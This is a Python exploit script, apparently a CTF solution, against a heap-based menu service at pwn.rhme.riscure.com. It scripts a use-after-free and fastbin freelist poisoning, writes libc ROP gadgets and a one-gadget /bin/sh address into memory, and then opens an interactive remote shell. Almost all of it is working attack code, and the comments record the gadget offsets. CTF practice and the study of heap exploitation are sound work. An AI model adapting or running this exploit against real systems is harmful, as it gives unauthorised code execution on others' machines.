@deanjerkovich
Created August 29, 2017 01:10
#!/usr/bin/env python
import socket
import time
import telnetlib
import struct
# Addresses recorded for one particular run of the target. They do not match
# the values noted in the comments further down (e.g. the 0x1a34000 heap base
# mentioned near the struct.pack call), so re-check them before every run.
LIBC_BASE = 0x7eff13bcb000
HEAP_BASE = 0x248b000
# Seconds to pause after each send/recv, presumably so the remote side has
# answered before the next line of input goes out.
SLEEP_TIME = 1
# Raw TCP connection to the challenge service. The Telnet object is created
# without a host and is only used at the end to take over this socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("pwn.rhme.riscure.com", 1337))
#s.connect(("127.0.0.1",1337))
t = telnetlib.Telnet()
def doRecv():
    """Read up to 1024 bytes from the shared socket, echo them, then pause.

    Reads the module-level socket ``s`` and sleeps for ``SLEEP_TIME``
    seconds afterwards. Returns None.
    """
    chunk = s.recv(1024)
    print "<< ", chunk
    time.sleep(SLEEP_TIME)
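def doSend(data):
    """Echo *data*, send it with a trailing newline on the shared socket, pause.

    Args:
        data: one line of input for the remote service (str, Python 2);
            a "\\n" terminator is appended before sending.

    Uses the module-level socket ``s`` and sleeps ``SLEEP_TIME`` seconds
    after the write. Returns None.
    """
    print ">> ", data
    # sendall() keeps writing until the whole buffer is out. A plain send()
    # may transmit only a prefix, and the rest of the scripted sequence would
    # then be out of step with what the remote menu is reading.
    s.sendall(data + "\n")
    time.sleep(SLEEP_TIME)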
# Scripted walk through the service's text menu. Each doSend() below is one
# line of input (it looks like a menu choice or a field value) in the order
# the menu expects, with SLEEP_TIME between lines. The ordering and the
# pauses are load-bearing, so the sequence is kept as a flat list.
doRecv()
# Block until the operator confirms a debugger is attached; raw_input is
# Python 2 and the returned value is never used.
blahfuck = raw_input('attach debugger and press enter..')
doRecv()
doSend("1") # add our fake chunk player
doSend("fake")
doSend("33")
doSend("0")
doSend("33")
doSend("0")
doSend("1")
doSend("hax") # add a player
doSend("1")
doSend("1")
doSend("1")
doSend("1")
doSend("3") # get a pointer to it
doSend("1")
doSend("2") # free underlying data
doSend("1")
doSend("4")
doSend("1")
# the below is a heap offset | this is 0x1620 offset from heap base.
# heap base == 0x1a34000
# offset: 0x1620
# == 0x1a35620
# '<L' packs a 4-byte little-endian value, unlike the '<Q' (8-byte) packs
# further down; struct.pack raises struct.error if HEAP_BASE + 0x1620 ever
# exceeds 32 bits. The heap base quoted in the comment above differs from
# HEAP_BASE, so these notes are from a different run.
doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk
doSend("0")
doSend("1")
doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist
doSend("3") # so our poisoned malloc is in response to the Name malloc
doSend("3")
doSend("3")
doSend("3")
doSend("1")
doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will
doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of
doSend("4") # of our choosing
doSend("4")
doSend("4")
doSend("3")
doSend("0")
doSend("4")
doSend("1")
# 8-byte little-endian libc-relative value.
doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))
doSend("1")
# Three 8-byte libc-relative values built up front so they can be joined
# into a single write below; the offsets are explained in the trailing
# comments at the end of the file.
g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)
# Sent directly rather than through doSend(), so there is no echo and no
# SLEEP_TIME pause; the "\n" terminator is included by hand.
# NOTE(review): s.send() may transmit fewer bytes than requested;
# s.sendall() would guarantee the whole buffer is written.
s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")
# Hand the already-connected socket to telnetlib and drop into an
# interactive session on it.
t.sock = s
t.interact()
# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3
# /bin/sh 0x7f503050d6c0
# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
# 0x7f5030436b78 0x1fb78 pop r12, ret